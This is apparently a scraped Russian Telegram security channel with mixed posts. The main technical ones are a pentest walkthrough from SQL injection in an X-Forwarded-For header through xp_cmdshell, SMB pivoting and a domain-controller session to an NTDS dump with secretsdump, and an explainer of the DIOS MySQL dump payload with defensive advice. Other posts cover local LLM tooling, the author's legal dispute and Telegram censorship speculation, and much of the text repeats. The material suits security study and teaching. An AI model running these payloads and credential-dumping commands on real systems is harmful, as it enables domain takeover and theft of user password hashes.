Из интересных и лёгких кейсов в последнее время:
SQL-инъекция → MSSQL → AD takeover
Шаг 1. sql injection в x-forwarded-for
Слипнулось на 5 секунд - збс. Получаем субд и смотрим пользователя от которого запущена субд.
Пользователь: svc_webapp@domain
Шаг 2. sqlmap os-shell
Немного теории, чтобы работал os-shell звёзды должны сойтись так, чтобы на уязвимом сервере был примерно такой стэк:
Шаг 3. Выполняем системные команды:
Шаг 4. Пивот во внутрянку:
net use — подключение сетевого ресурса (файловой шары SMB).
\\fileserver\deploy$ — скрытая административная шара. Такие папки не отображаются при обычном просмотре сети, но доступны, если знаешь точный путь.
/user:domain\svc_webapp P@ssword! — аутентификация от имени сервисной учётки, креды которой мы получили через SQL-инъекцию (или из базы).
Шаг 5. Интеррактивный доступ:
Собираем интерактивный сеанс на сервере:
Попадаем на домен контроллер (дк)
Шаг 6. NTDS
На ДК выполняем:
7. Берём хэшики
Все NTLM-хэши пользователей домена в кармане.
Итог:
Из одной SQL-инъекции в заголовке:
1. доступ к MSSQL
2. выполнение команд через xp_cmdshell,
3. нахождение сервисных кредов,
4. интерактивный доступ к DC,
5. дамп NTDS и полный контроль домена.
SQL-инъекция → MSSQL → AD takeover
Шаг 1. sql injection в x-forwarded-for
GET /portal HTTP/1.1
Host: target.local
X-Forwarded-For: 1' IF(1=1, SLEEP(5), 0)--
Слипнулось на 5 секунд - збс. Получаем субд и смотрим пользователя от которого запущена субд.
Пользователь: svc_webapp@domain
Шаг 2. sqlmap os-shell
Немного теории, чтобы работал os-shell звёзды должны сойтись так, чтобы на уязвимом сервере был примерно такой стэк:
1. База поддерживает вызов системных команд
MSSQL → через xp_cmdshell, sp_oacreate, CLR-ассамблеи.
MySQL/MariaDB → при включённых FILE/PROCESS правах и доступе к sys_exec()/udf.
PostgreSQL → через COPY TO PROGRAM, lo_export(), pg_execute_server_program() и пр.
Oracle → через DBMS_SCHEDULER, DBMS_PIPE, UTL_HTTP, JAVA.
2. Учётка в базе имеет достаточные права
В MSSQL нужен хотя бы sysadmin, иначе xp_cmdshell может быть недоступен.
В PostgreSQL нужен суперпользователь.
В MySQL права SUPER или FILE.
3. Веб-приложение действительно исполняет команды на том же сервере
Если база на отдельном хосте (DB-only сервер без оболочки), то максимум получится писать файлы, но не RCE.
Когда не работает --os-shell:
1. Если у учётки в БД нет прав (например, только db_datareader в MSSQL).
2. Если функции для системных вызовов отключены админом (xp_cmdshell выключен по умолчанию в новых MSSQL).
3. Если база стоит на отдельном хосте, и даже при xp_cmdshell ты попадаешь в среду без нужных утилит (например, только SQL Service без интерактивного шелла).
4. Если WAF/фильтры блокируют полезные нагрузки.
5. Если sqlmap видит SQLi, но она read-only (например, только SELECT без возможности UNION/INSERT/UPDATE).
Шаг 3. Выполняем системные команды:
EXEC xp_cmdshell 'whoami /all';
ответ:
domain\svc_webapp
Privileges : SeBackupPrivilege, SeServiceLogonRight
Шаг 4. Пивот во внутрянку:
net use \\fileserver\deploy$ /user:domain\svc_webapp P@ssword!
$User = "DOMAIN\deploy_admin"
$Pass = ConvertTo-SecureString "Qwerty123!" -AsPlainText -Force
net use — подключение сетевого ресурса (файловой шары SMB).
\\fileserver\deploy$ — скрытая административная шара. Такие папки не отображаются при обычном просмотре сети, но доступны, если знаешь точный путь.
/user:domain\svc_webapp P@ssword! — аутентификация от имени сервисной учётки, креды которой мы получили через SQL-инъекцию (или из базы).
Шаг 5. Интеррактивный доступ:
Собираем интерактивный сеанс на сервере:
Enter-PSSession -ComputerName dc01.domain.local -Credential domain\deploy_admin
Попадаем на домен контроллер (дк)
Шаг 6. NTDS
На ДК выполняем:
ntdsutil "ac i ntds" "ifm" "create full c:\temp\dump" q q
7. Берём хэшики
secretsdump.py -ntds ntds.dit -system system.bak LOCAL
Все NTLM-хэши пользователей домена в кармане.
Итог:
Из одной SQL-инъекции в заголовке:
1. доступ к MSSQL
2. выполнение команд через xp_cmdshell,
3. нахождение сервисных кредов,
4. интерактивный доступ к DC,
5. дамп NTDS и полный контроль домена.
🔥10❤7👍4😁1
Нейросети в пентесте
Пентест сегодня — это не только эксплойты и отчёты, но и огромные массивы данных, которые нужно быстро разобрать, структурировать и понять. Логов, дампов и открытых источников становится всё больше, а времени всё меньше. И здесь нейросети уже перестали быть игрушкой: они стали инструментом, который экономит часы рутинной работы.
Современные модели умеют не просто «отвечать на вопросы», а работать с контекстом. Если к ним подключить поисковик, векторную базу и локальный движок вроде Ollama, получается полноценная система: она собирает данные, индексирует их и на лету подбирает нужные фрагменты для анализа. Такой стек можно собрать в Docker и держать полностью локально — без зависимости от внешних API и рисков утечки.
Задачи, где нейросети реально помогают:
— автоматическая разведка и классификация сервисов по следам в открытых источниках;
— анализ больших объёмов логов и конфигураций, поиск аномалий;
— формирование шаблонов PoC и вспомогательных скриптов;
— черновики отчётов и резюме для заказчика на понятном языке.
Главное — не ждать от модели чудес. Она не взламывает и не заменяет эксперта. Но она отлично справляется с подготовкой, поиском контекста и объяснением сложных вещей. Это уже не автопилот, а умный помощник, который экономит время и держит фокус на сути задачи.
На скриншоте мой локальный стэк. Если у вас есть свои наработки - делитесь))
Пентест сегодня — это не только эксплойты и отчёты, но и огромные массивы данных, которые нужно быстро разобрать, структурировать и понять. Логов, дампов и открытых источников становится всё больше, а времени всё меньше. И здесь нейросети уже перестали быть игрушкой: они стали инструментом, который экономит часы рутинной работы.
Современные модели умеют не просто «отвечать на вопросы», а работать с контекстом. Если к ним подключить поисковик, векторную базу и локальный движок вроде Ollama, получается полноценная система: она собирает данные, индексирует их и на лету подбирает нужные фрагменты для анализа. Такой стек можно собрать в Docker и держать полностью локально — без зависимости от внешних API и рисков утечки.
Задачи, где нейросети реально помогают:
— автоматическая разведка и классификация сервисов по следам в открытых источниках;
— анализ больших объёмов логов и конфигураций, поиск аномалий;
— формирование шаблонов PoC и вспомогательных скриптов;
— черновики отчётов и резюме для заказчика на понятном языке.
Главное — не ждать от модели чудес. Она не взламывает и не заменяет эксперта. Но она отлично справляется с подготовкой, поиском контекста и объяснением сложных вещей. Это уже не автопилот, а умный помощник, который экономит время и держит фокус на сути задачи.
На скриншоте мой локальный стэк. Если у вас есть свои наработки - делитесь))
❤4
Кому интересно почитайте, в основном из-за этой активности не было свежих постов 😆
https://cisoclub.ru/shag-k-kiberustojchivosti-pochta-rossii-zavershila-pervuju-fazu-masshtabnogo-proekta-s-uchastiem-liderov-rynka-ib
https://cisoclub.ru/shag-k-kiberustojchivosti-pochta-rossii-zavershila-pervuju-fazu-masshtabnogo-proekta-s-uchastiem-liderov-rynka-ib
😁3👏2
Web Application Security Notes
Добрый нахуй вечер. 0 Уведомлений, никто меня никуда не вызывал, просто снихуя арест по уголовному делу, следователь вынес постановление из Тюмени. (Я НИРАЗУ В ЖИЗНИ ТАМ НЕ БЫЛ) П,С. ПОСТАНОВЛЕНИЯ Я НЕ ВИДЕЛ
Апдейт: Позвонил в МВД этого района, назвал номер дела
Их ответ: "Мы не знаем, досвидания"
Их ответ: "Мы не знаем, досвидания"
👏3❤1
Апдейт: Нашёл следователя, история такая:
После моего прилёта в РФ из Китая, я обменял валюту на рубли через обменник. Там было 3 платежа. Один из них на 90 000 рублей. Потерпевший который подал заявление в полицию заявил следующее: "я проиграл на ставках деньги, меня обманули". В итоге арест на 90 000 рублей наложили на меня. Обещали вызвать в ближайшее время на допрос в МВД.
После моего прилёта в РФ из Китая, я обменял валюту на рубли через обменник. Там было 3 платежа. Один из них на 90 000 рублей. Потерпевший который подал заявление в полицию заявил следующее: "я проиграл на ставках деньги, меня обманули". В итоге арест на 90 000 рублей наложили на меня. Обещали вызвать в ближайшее время на допрос в МВД.
🤔4😱2
Представь, что человеческий мозг — это база данных.
Старая. Огромная. Критически важная.
Голос в твоей голове — не админ и не "ты".
Это консоль, которая читает логи выполненных запросов.
Мозг уже решил и всё сделал, голос в голове - прочитал
Ты видишь мысль,
потому что запрос уже отработал.
Теперь допустим, что входные данные в эту БД —
слова, образы, интонации, заголовки, страхи.
И что они почти нигде не фильтруются.
В таком мире возможны вещи вроде:
— подсовываешь заранее знакомый паттерн → запрос выполняется без проверки
— повторяешь одно и то же → кэш начинает считать это истиной
— добавляешь эмоцию → проверка условий пропускается
Это не магия.
Просто плохая валидация входа.
В рамках эксперимента соцсети, новости и реклама —
это внешний пользователь,
который бесконечно шлёт запросы в твою БД.
Большинство harmless.
Некоторые — нет.
Сознание видит результат в логах
и думает, что это его собственная мысль.
Если продолжить аналогию:
— фаервол опционален
— роли доступа размыты
Антивирус в этой архитектуре не предусмотрен....
Старая. Огромная. Критически важная.
Голос в твоей голове — не админ и не "ты".
Это консоль, которая читает логи выполненных запросов.
Мозг уже решил и всё сделал, голос в голове - прочитал
Ты видишь мысль,
потому что запрос уже отработал.
Теперь допустим, что входные данные в эту БД —
слова, образы, интонации, заголовки, страхи.
И что они почти нигде не фильтруются.
В таком мире возможны вещи вроде:
— подсовываешь заранее знакомый паттерн → запрос выполняется без проверки
— повторяешь одно и то же → кэш начинает считать это истиной
— добавляешь эмоцию → проверка условий пропускается
Это не магия.
Просто плохая валидация входа.
В рамках эксперимента соцсети, новости и реклама —
это внешний пользователь,
который бесконечно шлёт запросы в твою БД.
Большинство harmless.
Некоторые — нет.
Сознание видит результат в логах
и думает, что это его собственная мысль.
Если продолжить аналогию:
— фаервол опционален
— роли доступа размыты
Антивирус в этой архитектуре не предусмотрен....
Ограничения которые вас ещё ждут (не скажу откуда инфа):
1. Точечное замедление трафика
Не «всё легло», а:
тормозятся медиа-файлы (видео, voice, GIF),
режется скорость в пиковые часы,
ухудшается качество звонков.
Формально — «технические сбои», по факту — давление. Уже отработанная схема.
2. Блокировка отдельных функций
Без отключения всего сервиса:
запрет публичных каналов,
проблемы с ботами,
отключение платежей / донатов,
ограничения на поиск и рекомендации.
Пользователи остаются, но Telegram становится «обрезанным».
3. Фильтрация и принудительное удаление контента
Через:
реестр запрещённой информации,
требования к Telegram удалять конкретные посты / каналы,
давление по линии «экстремизм / фейки / мошенничество».
Если не удаляют — следующий уровень санкций.
4. Давление через инфраструктуру
Не сам Telegram, а окружение:
блокировки CDN, облаков, IP-пулов,
давление на российские дата-центры и провайдеров,
проблемы с доставкой обновлений.
Юридически «мы ничего не блокировали».
5. Юридическая и финансовая удавка
Классика:
бесконечные штрафы,
иски за «неисполнение требований»,
требования локализации данных,
угрозы признания «иностранным сервисом, нарушающим закон».
Работает на нервы и инвесторов.
6. Ограничения для бизнеса и рекламы
Telegram не для всех:
запрет официальной рекламы,
блокировка работы с госструктурами,
давление на бренды и СМИ («не используйте»).
Мессенджер остаётся, но теряет деньги и статус.
7. Маркировка и стигматизация
Не техническая мера, а имиджевая:
публичное объявление «небезопасным»,
рассказы про «террористов и мошенников»,
рекомендации «не использовать».
Работает на массовую аудиторию, не на айтишников.
8. Сценарий «как с YouTube»
Самый вероятный средний вариант:
постепенно ухудшать качество,
без объявления войны,
чтобы люди уходили сами.
Долго, муторно, но политически удобно.
1. Точечное замедление трафика
Не «всё легло», а:
тормозятся медиа-файлы (видео, voice, GIF),
режется скорость в пиковые часы,
ухудшается качество звонков.
Формально — «технические сбои», по факту — давление. Уже отработанная схема.
2. Блокировка отдельных функций
Без отключения всего сервиса:
запрет публичных каналов,
проблемы с ботами,
отключение платежей / донатов,
ограничения на поиск и рекомендации.
Пользователи остаются, но Telegram становится «обрезанным».
3. Фильтрация и принудительное удаление контента
Через:
реестр запрещённой информации,
требования к Telegram удалять конкретные посты / каналы,
давление по линии «экстремизм / фейки / мошенничество».
Если не удаляют — следующий уровень санкций.
4. Давление через инфраструктуру
Не сам Telegram, а окружение:
блокировки CDN, облаков, IP-пулов,
давление на российские дата-центры и провайдеров,
проблемы с доставкой обновлений.
Юридически «мы ничего не блокировали».
5. Юридическая и финансовая удавка
Классика:
бесконечные штрафы,
иски за «неисполнение требований»,
требования локализации данных,
угрозы признания «иностранным сервисом, нарушающим закон».
Работает на нервы и инвесторов.
6. Ограничения для бизнеса и рекламы
Telegram не для всех:
запрет официальной рекламы,
блокировка работы с госструктурами,
давление на бренды и СМИ («не используйте»).
Мессенджер остаётся, но теряет деньги и статус.
7. Маркировка и стигматизация
Не техническая мера, а имиджевая:
публичное объявление «небезопасным»,
рассказы про «террористов и мошенников»,
рекомендации «не использовать».
Работает на массовую аудиторию, не на айтишников.
8. Сценарий «как с YouTube»
Самый вероятный средний вариант:
постепенно ухудшать качество,
без объявления войны,
чтобы люди уходили сами.
Долго, муторно, но политически удобно.
👍2
Web Application Security Notes
https://matrix.to/#/#hack4sec:hack4sec.net
Напоминаю, что в связи с последними событиями мы используем сервер в Matrix.
Поддержка Jabber прекращена.
Если для вас приоритетны безопасность и защищённая коммуникация — рекомендую подключаться к Matrix.
При регистрации можете использовать - hack4sec.net:8448
Поддержка Jabber прекращена.
Если для вас приоритетны безопасность и защищённая коммуникация — рекомендую подключаться к Matrix.
При регистрации можете использовать - hack4sec.net:8448
❤1
This media is not supported in your browser
VIEW IN TELEGRAM
Оказывается не все знают про DIOS 😆
DIOS (Dump In One Shot) — это техника SQL-инъекции, позволяющая выгрузить структуру и данные всей базы данных одним SQL-запросом.
Чаще всего используется при MySQL-инъекциях, когда нужно обойти ограничения вывода (например, когда сайт показывает только одну строку результата).
Обычная SQL-инъекция извлекает данные построчно:
Потом:
Это долго и шумно.
DIOS использует переменные MySQL (@var) и функцию CONCAT(), чтобы накопить все данные в одной строке.
Принцип работы:
создаётся переменная
в цикле добавляются данные
возвращается итоговая строка
В итоге вся база собирается в одну длинную строку.
Сначала инициализируется переменная:
Далее выполняется конкатенация всех таблиц:
Точно так же можно получить:
таблицы
колонки
данные пользователей
хеши паролей
Метод используют потому что:
• работает даже если вывод ограничен одной строкой
• позволяет быстро выгрузить структуру базы
• уменьшает количество запросов (меньше логов)
DIOS не всегда работает:
если запрещены пользовательские переменные
если результат сильно ограничен по длине
если используется WAF
Как защититься
Чтобы защитить приложение:
• использовать prepared statements
• фильтровать пользовательский ввод
• отключить лишние привилегии MySQL
• использовать WAF / IDS
DIOS (Dump In One Shot) — это техника SQL-инъекции, позволяющая выгрузить структуру и данные всей базы данных одним SQL-запросом.
Чаще всего используется при MySQL-инъекциях, когда нужно обойти ограничения вывода (например, когда сайт показывает только одну строку результата).
Обычная SQL-инъекция извлекает данные построчно:
SELECT table_name FROM information_schema.tables LIMIT 0,1
Потом:
LIMIT 1,1
LIMIT 2,1
Это долго и шумно.
DIOS использует переменные MySQL (@var) и функцию CONCAT(), чтобы накопить все данные в одной строке.
Принцип работы:
создаётся переменная
в цикле добавляются данные
возвращается итоговая строка
В итоге вся база собирается в одну длинную строку.
Сначала инициализируется переменная:
SET @x := 0x00;
Далее выполняется конкатенация всех таблиц:
SELECT (@x) FROM (
SELECT (@x := CONCAT(@x, table_name, 0x3c62723e))
FROM information_schema.tables
WHERE table_schema=database()
) a;
Точно так же можно получить:
таблицы
колонки
данные пользователей
хеши паролей
Метод используют потому что:
• работает даже если вывод ограничен одной строкой
• позволяет быстро выгрузить структуру базы
• уменьшает количество запросов (меньше логов)
DIOS не всегда работает:
если запрещены пользовательские переменные
если результат сильно ограничен по длине
если используется WAF
Как защититься
Чтобы защитить приложение:
• использовать prepared statements
• фильтровать пользовательский ввод
• отключить лишние привилегии MySQL
• использовать WAF / IDS
🔥4❤3👍1
Web Application Security Notes
Апдейт: Нашёл следователя, история такая: После моего прилёта в РФ из Китая, я обменял валюту на рубли через обменник. Там было 3 платежа. Один из них на 90 000 рублей. Потерпевший который подал заявление в полицию заявил следующее: "я проиграл на ставках…
Пришла отписка....
Расскажу вкратце, почему наша "система" не работает.
1. Некая Васильева приходит на рынок и покупает огурцы на 600к рублей, у всех продавцов подряд.
2. После этого она отдаёт (или использует) огурцы неким "мошенникам".
3. Идёт в полицию и заявляет, что купила их под "воздействием" мошенников.
4. Деньги списывают обратно у продавцов и возвращают ей, а продавцам - хуй
С - Справедливость
Я просто в ахуе с нашего законодательства. Предложения по релокейту пишите в личку.
п.с (Совсем для ебанутых огурцы = крипта в данном рассказе)
Расскажу вкратце, почему наша "система" не работает.
1. Некая Васильева приходит на рынок и покупает огурцы на 600к рублей, у всех продавцов подряд.
2. После этого она отдаёт (или использует) огурцы неким "мошенникам".
3. Идёт в полицию и заявляет, что купила их под "воздействием" мошенников.
4. Деньги списывают обратно у продавцов и возвращают ей, а продавцам - хуй
С - Справедливость
Я просто в ахуе с нашего законодательства. Предложения по релокейту пишите в личку.
п.с (Совсем для ебанутых огурцы = крипта в данном рассказе)
🥰6👍2😁1🤬1